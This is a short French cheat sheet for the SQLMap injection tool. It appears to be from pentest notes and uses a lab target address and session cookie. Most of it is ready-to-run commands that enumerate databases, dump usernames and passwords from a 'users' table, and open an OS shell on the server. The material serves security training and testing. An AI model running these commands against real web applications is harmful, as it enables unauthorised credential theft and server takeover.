SQLMap

SQLMap est un outil de test de pénétration open-source spécifiquement conçu pour détecter et exploiter les vulnérabilités liées aux injections SQL dans les applications web. Il automatise le processus de détection et d'exploitation des failles SQL en interagissant avec les bases de données sous-jacentes. SQLMap est utilisé par les professionnels de la sécurité informatique et les chercheurs en sécurité pour évaluer la sécurité des applications web en identifiant et en exploitant les failles de sécurité liées à SQL.

Lister les bases de données :

sqlmap -u 'http://192.168.71.147/dashboard.php?id=1' --dbs --cookie "PHPSESSID=s9f7kln1lfhumqfo556rs7svvt"

Chercher les tables dans une base de données donnée :

sqlmap -u 'http://192.168.71.147/dashboard.php?id=1' -D darkhole_2 --tables --cookie "PHPSESSID=s9f7kln1lfhumqfo556rs7svvt"

Chercher les colonnes dans une table spécifique :

sqlmap -u 'http://192.168.71.147/dashboard.php?id=1' -D darkhole_2 --columns --cookie "PHPSESSID=s9f7kln1lfhumqfo556rs7svvt"

Dump des utilisateurs et des mots de passe de la table "users" :

sqlmap -u 'http://192.168.71.147/dashboard.php?id=1' -D darkhole_2 --columns --cookie "PHPSESSID=s9f7kln1lfhumqfo556rs7svvt" -T users -C username,password --dump

Console interactive :

sqlmap -u 'http://192.168.71.147/dashboard.php?id=1' --cookie "PHPSESSID=s9f7kln1lfhumqfo556rs7svvt" --os-shell --batch

Paramètres intéressants:

Indiquer le niveau de risque et de profondeur de l'attaque :

sqlmap -u 'http://192.168.71.147/dashboard.php?id=1' --cookie "PHPSESSID=s9f7kln1lfhumqfo556rs7svvt" --dbms mysql --risk 3 --level 4

Si on connaît le type de base de données avec le paramètre :

--dbms mysql

Pour tester tous les types d'attaques sans demande chaque fois :

--batch

Mis à jour il y a 8 mois

Ce contenu vous a-t-il été utile ?